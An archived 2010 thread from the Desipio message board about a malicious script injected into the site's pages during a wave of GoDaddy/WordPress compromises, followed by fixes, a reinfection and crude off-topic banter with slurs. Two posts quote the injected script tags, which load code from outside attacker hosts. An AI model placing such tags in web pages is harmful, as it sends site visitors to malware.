Desipio Message Board

General Category => Desipio Lounge => Topic started by: Dr. Nguyen Van Falk on May 07, 2010, 09:26:24 AM

Title: Virus (ANDY SAY RELAX)
Post by: Dr. Nguyen Van Falk on May 07, 2010, 09:26:24 AM
The SBox has been abuzz about a script running on the messageboard that redirects some visitors to a virus.

<script src="http://indesignstudioinfo.com/ls.php"></script>

This script is still present on every page of Desipio (messageboard and "articles").

Use the site at your own risk.
Title: Re: Virus
Post by: Dr. Nguyen Van Falk on May 07, 2010, 09:29:47 AM
Note: us Macfags are likely safe.
Title: Re: Virus
Post by: Slaky on May 07, 2010, 09:48:04 AM
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 09:29:47 AM
Note: us Macfags are likely safe.

Score one for the yuppies.
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Yeti on May 07, 2010, 01:52:08 PM
That sucked.
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Andy on May 07, 2010, 02:46:31 PM
Now it's fixed.  Holy crap that sucked.
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Bort on May 07, 2010, 03:01:16 PM
Quote from: Andy on May 07, 2010, 02:46:31 PM
Now it's fixed.  Holy crap that sucked.
I blame RV.
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Chuck to Chuck on May 07, 2010, 03:06:05 PM
Is it all gone?  The old stuff?
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Dr. Nguyen Van Falk on May 07, 2010, 03:35:43 PM
Quote from: Chuck to Chuck on May 07, 2010, 03:06:05 PM
Is it all gone?  The old stuff?

Still gone from the published site, yes.*

But, as the old threads got Rattoed sometime before Wednesday morning, that's probably unrelated to this virus business today.

*Though, if Andy somehow happens to have a pre-Ratto datase backup somewhere, Steph's lost Desipio corpus (http://www.desipio.com/messageboard/index.php?action=profile;u=82;sa=showPosts) may possibly be recoverable yet.
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Andy on May 07, 2010, 03:47:35 PM
I can bring the old posts back.  They're all backed up.  Kind of like Karry Ling.
Title: Re: Virus (READ THIS, ASSHOLES)
Post by: Chuck to Chuck on May 07, 2010, 03:54:20 PM
Quote from: Andy on May 07, 2010, 03:47:35 PM
I can bring the old posts back.  They're all backed up.  Kind of like Karry Ling.

Thank god.  I was afraid we lost Dwyer in Cubs body paint.
Title: Re: Virus (all is well, funboys)
Post by: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.
Title: Re: Virus (all is well, funboys)
Post by: CT III on May 07, 2010, 08:02:04 PM
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.

Who the hell would Google Hockeenight?
Title: Re: Virus (all is well, funboys)
Post by: ChuckD on May 07, 2010, 08:05:53 PM
Quote from: CT III on May 07, 2010, 08:02:04 PM
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.

Who the hell would Google Hockeenight?

http://www.readwriteweb.com/archives/facebook_wants_to_be_your_one_true_loginpage4.php#comments
Title: Re: Virus (all is well, funboys)
Post by: Wheezer on May 07, 2010, 08:18:39 PM
Quote from: CT III on May 07, 2010, 08:02:04 PM
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.

Who the hell would Google Hockeenight?

Exactly the point (http://dancingczars.wordpress.com/2010/05/06/fbi-now-looking-into-possible-secret-messages-embedded-in-google-maps/).
Title: Re: Virus (all is well, funboys)
Post by: Dr. Nguyen Van Falk on May 07, 2010, 08:30:18 PM
Quote from: CT III on May 07, 2010, 08:02:04 PM
Who the hell would Google Hockeenight?

Illiterate Canadians?
Title: Re: Virus (all is well, funboys)
Post by: Quality Start Machine on May 07, 2010, 09:35:48 PM

We don't use Wordpress.
Title: Re: Virus (all is well, funboys)
Post by: Slaky on May 07, 2010, 09:59:46 PM
Quote from: Fork on May 07, 2010, 09:35:48 PM

We don't use Wordpress.

You guys use Clown Vomit 2.0, right?
Title: Re: Virus (all is well, funboys)
Post by: Quality Start Machine on May 07, 2010, 10:41:01 PM
Quote from: Slaky on May 07, 2010, 09:59:46 PM
Quote from: Fork on May 07, 2010, 09:35:48 PM

We don't use Wordpress.

You guys use Clown Vomit 2.0, right?

3.0. The Beta, Ogden.
Title: Re: Virus (AND... IT'S BACK)
Post by: Dr. Nguyen Van Falk on May 12, 2010, 08:28:50 AM
Bump:

<script src="http://holasionweb.com/oo.php"></script>

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html
Title: Re: Virus (AND... IT'S BACK)
Post by: Dr. Nguyen Van Falk on May 12, 2010, 10:02:27 AM
Seriously, guys.

No joke.

It's still here.

Oleg just got hit by it.

Like before...

Quote from: Dr. Nguyen Van Falk on May 07, 2010, 09:26:24 AM
Use the site at your own risk.
Title: Re: Virus (AND... IT'S BACK)
Post by: Slaky on May 12, 2010, 10:11:08 AM
Quote from: Dr. Nguyen Van Falk on May 12, 2010, 10:02:27 AM
Seriously, guys.

No joke.

It's still here.

Oleg just got hit by it.

Like before...

Quote from: Dr. Nguyen Van Falk on May 07, 2010, 09:26:24 AM
Use the site at your own risk.

Macfag safety dance.
Title: Re: Virus (AND... IT'S BACK)
Post by: Bort on May 12, 2010, 10:37:24 AM
Quote from: Dr. Nguyen Van Falk on May 12, 2010, 10:02:27 AM
Seriously, guys.

No joke.

It's still here.

Oleg just got hit by it.

Like before...

Quote from: Dr. Nguyen Van Falk on May 07, 2010, 09:26:24 AM
Use the site at your own risk.
Me too, although I think it was from HJE.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.

Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Yeti on May 12, 2010, 11:20:43 AM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Bring on the Fisted Foul message board...
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Kermit IV on May 14, 2010, 01:26:51 PM
Quote from: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.

Yeah, TDubbs has some great ideas for comedy.

This did have the one good result of making me notice that my buddy is wearing a safari hat.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Bort on May 14, 2010, 01:29:55 PM
Quote from: Kermit IV on May 14, 2010, 01:26:51 PM
Quote from: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.

Yeah, TDubbs has some great ideas for comedy.

This did have the one good result of making me notice that my buddy is wearing a safari hat.

Morph should have added Lee Van Cleef on a giraffe. Like all good photoshops.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: PenPho on May 14, 2010, 01:30:06 PM
Quote from: Kermit IV on May 14, 2010, 01:26:51 PM
Quote from: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.

Yeah, TDubbs has some great ideas for comedy.

This did have the one good result of making me notice that my buddy is wearing a safari hat.

You have a flower in your ear...I would probably lay off Safari Guy.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Kermit IV on May 14, 2010, 01:39:11 PM
Quote from: PenPho on May 14, 2010, 01:30:06 PM
Quote from: Kermit IV on May 14, 2010, 01:26:51 PM
Quote from: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.

Yeah, TDubbs has some great ideas for comedy.

This did have the one good result of making me notice that my buddy is wearing a safari hat.

You have a flower in your ear...I would probably lay off Safari Guy.

A dandelion is not a flower.  It is the slayer of flowers.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Quality Start Machine on May 14, 2010, 01:45:01 PM
Quote from: Kermit IV on May 14, 2010, 01:39:11 PM
Quote from: PenPho on May 14, 2010, 01:30:06 PM
Quote from: Kermit IV on May 14, 2010, 01:26:51 PM
Quote from: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.

Yeah, TDubbs has some great ideas for comedy.

This did have the one good result of making me notice that my buddy is wearing a safari hat.

You have a flower in your ear...I would probably lay off Safari Guy.

A dandelion is not a flower.  It is the slayer of flowers.

I'm impressed that you know Peter Potamus.
Title: Re: Virus (AND... IT'S BACK)---And it's fixed again
Post by: Internet Apex on May 16, 2010, 12:23:29 PM
Quote from: Fork on May 14, 2010, 01:45:01 PM
Quote from: Kermit IV on May 14, 2010, 01:39:11 PM
Quote from: PenPho on May 14, 2010, 01:30:06 PM
Quote from: Kermit IV on May 14, 2010, 01:26:51 PM
Quote from: morpheus on May 13, 2010, 01:46:32 PM
Quote from: PenPho on May 13, 2010, 12:17:33 PM
Quote from: Kermit IV on May 13, 2010, 12:14:19 PM
Quote from: Andy on May 12, 2010, 11:18:11 AM
I fixed it again.  Kerm and I are in discussions right now about something that would move us off of WordPress and Go Daddy forever.  It's not like we co-own a perfectly functioning Web site, or anything.



Did you fix everything yet?  I'm about to fist that hot bitch from the GoDaddy commercials.

I'll take pictures.

Oh...NOW you decide you like Danica Patrick.

(http://i451.photobucket.com/albums/qq237/morph_album/DanicaandKerm.jpg)

Sorry Kerm.  Couldn't resist.

EDIT: I should give full credit to TDubbs for the idea.

Yeah, TDubbs has some great ideas for comedy.

This did have the one good result of making me notice that my buddy is wearing a safari hat.

You have a flower in your ear...I would probably lay off Safari Guy.

A dandelion is not a flower.  It is the slayer of flowers.

I'm impressed that you know Peter Potamus.

http://stuffwhitepeoplelike.com/2008/03/11/87-outdoor-performance-clothes/